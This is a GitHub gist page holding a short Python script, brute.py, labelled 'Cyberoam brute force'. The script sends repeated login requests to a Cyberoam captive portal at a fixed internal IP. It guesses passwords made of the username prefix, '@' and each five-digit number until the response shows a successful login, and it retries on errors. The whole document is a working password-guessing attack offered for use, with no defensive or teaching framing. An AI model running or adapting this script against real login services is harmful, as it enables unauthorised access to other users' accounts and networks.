Skip to content

Instantly share code, notes, and snippets.

@kausality

kausality/brute.py

Created August 10, 2015 20:08
Show Gist options
  • Save kausality/77b67b9966e3f1f63bac to your computer and use it in GitHub Desktop.
Save kausality/77b67b9966e3f1f63bac to your computer and use it in GitHub Desktop.
Download ZIP
Raw
brute.py
#Cyberoam brute force
import time
import urllib.request
import urllib.parse
import sys
def fetchpage(url,values=None,header={"Referer":"http://www.google.co.in/"}):
data=None
try:
if values!=None:
data=urllib.parse.urlencode(values)
data=data.encode('utf-8')
req=urllib.request.Request(url,data,header)
response=urllib.request.urlopen(req)
html=response.read()
html=str(html)
return html
except Exception as e:
with open("errlog","a") as f:
f.write(str(e)+'\n')
time.sleep(2)
return fetchpage(url,values,header)
def send_request(user,password):
header={"Host":"10.1.0.45:8090",
"Origin":"http://10.1.0.45:8090",
"Referer":"http://10.1.0.45:8090/httpclient.html",
"User-Agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36"
}
values={"mode":191,
"username":user,
"password":password,
"a":1414864508167,
"producttype":0
}
r=fetchpage("http://10.1.0.45:8090/login.xml",values,header)
return r
def gen_password():
for i in range(10000,100000):
yield i
def brute_force(user):
success=['fully logged in','Maximum Login Limit']
fname=user.split('.')[0]+'@'
for i in gen_password():
password=fname+str(i)
print('Trying password: ',password)
m=send_request(user,password)
if success[0] in m or success[1] in m:
print('PASSWORD: ',password)
break
if __name__=="__main__":
brute_force(sys.argv[1])
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment